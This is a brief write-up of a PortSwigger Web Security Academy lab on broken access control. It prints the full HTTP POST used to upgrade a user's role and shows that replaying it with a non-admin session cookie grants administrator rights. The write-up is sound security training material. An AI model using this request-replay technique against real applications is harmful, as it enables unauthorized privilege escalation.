PortSwigger Lab: Multi-step process with no access control on one step
Task
This lab has an admin panel with a flawed multi-step process for changing a user’s role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.
Attempt
First let’s understand how the multi-step process for changing a user’s role works.
- Log in as
administrator - Go to the admin panel
- Select a user
- Press the ‘upgrade user’ button
- Press ‘yes’ when prompted ‘Are you sure?’
- The user’s role is set to admin
In step 5, the request below gets sent:
POST /admin-roles HTTP/2
Host: ID.web-security-academy.net
Cookie: session=COOKIE
Content-Length: 45
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ID.web-security-academy.net/admin-roles
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
action=upgrade&confirmed=true&username=carlos
While you can’t access the admin panel unless you’re admin, you can send the above request even if you’re not admin, bypassing access control. Sent a request to upgrade wiener with the session cookie of wiener’s worked.